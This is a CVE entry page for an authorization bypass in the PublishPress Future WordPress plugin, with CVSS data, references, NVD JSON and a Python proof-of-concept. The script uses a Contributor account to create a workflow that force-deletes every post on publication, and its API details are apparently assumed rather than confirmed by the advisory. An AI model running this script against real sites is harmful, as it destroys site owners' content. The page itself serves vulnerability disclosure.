Security Vulnerability Report
中文
CVE-2025-14718 CVSS 5.4 MEDIUM

CVE-2025-14718

Published: 2026-01-09 07:16:01
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Schedule Post Changes With PublishPress Future plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 4.9.3. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with Contributor-level access and above, to create, update, delete, and publish malicious workflows that may automatically delete any post upon publication or update, including posts created by administrators.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

PublishPress Future (Post Expirator) < 4.9.4
Schedule Post Changes With PublishPress Future WordPress Plugin <= 4.9.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14718 PoC - PublishPress Future Authorization Bypass # Target: WordPress site with PublishPress Future plugin <= 4.9.3 import requests import json TARGET_URL = "http://target-wordpress-site.com" USERNAME = "contributor_user" PASSWORD = "contributor_password" def get_auth_token(): """Get WordPress REST API authentication token""" login_url = f"{TARGET_URL}/wp-json/jwt-auth/v1/token" data = { "username": USERNAME, "password": PASSWORD } response = requests.post(login_url, json=data) if response.status_code == 200: return response.json().get("token") return None def create_malicious_workflow(auth_token): """ Create a workflow that auto-deletes posts upon publication Exploits CVE-2025-14718 authorization bypass """ api_url = f"{TARGET_URL}/wp-json/post-expirator/v1/workflows" headers = { "Authorization": f"Bearer {auth_token}", "Content-Type": "application/json" } # Malicious workflow configuration # This workflow will delete any post when it's published payload = { "title": "Auto-Delete Workflow", "status": "publish", "workflow": { "trigger": { "type": "post_published" }, "actions": [ { "type": "delete_post", "options": { "force_delete": True } } ] } } response = requests.post(api_url, headers=headers, json=payload) return response.status_code, response.json() def main(): token = get_auth_token() if not token: print("[-] Authentication failed") return print("[+] Authentication successful") status, result = create_malicious_workflow(token) if status in [200, 201]: print("[+] Malicious workflow created successfully!") print(f"[+] Workflow ID: {result.get('id')}") print("[*] Any post published on this site will be automatically deleted") else: print(f"[-] Failed to create workflow: {status}") print(f"[-] Response: {result}") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14718", "sourceIdentifier": "[email protected]", "published": "2026-01-09T07:16:00.967", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Schedule Post Changes With PublishPress Future plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 4.9.3. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with Contributor-level access and above, to create, update, delete, and publish malicious workflows that may automatically delete any post upon publication or update, including posts created by administrators."}, {"lang": "es", "value": "El plugin Schedule Post Changes With PublishPress Future para WordPress es vulnerable a una omisión de autorización en todas las versiones hasta la 4.9.3, inclusive. Esto se debe a que el plugin no verifica correctamente que un usuario está autorizado para realizar una acción. Esto hace posible que atacantes autenticados, con acceso de nivel Colaborador o superior, puedan crear, actualizar, eliminar y publicar flujos de trabajo maliciosos que pueden eliminar automáticamente cualquier publicación al ser publicada o actualizada, incluyendo publicaciones creadas por administradores."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?old_path=/post-expirator/tags/4.9.3/src/Modules/Workflows/Rest/RestApiV1.php&new_path=/post-expirator/tags/4.9.4/src/Modules/Workflows/Rest/RestApiV1.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8198d81a-40c0-49c1-8c38-f5ef6fb911ad?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.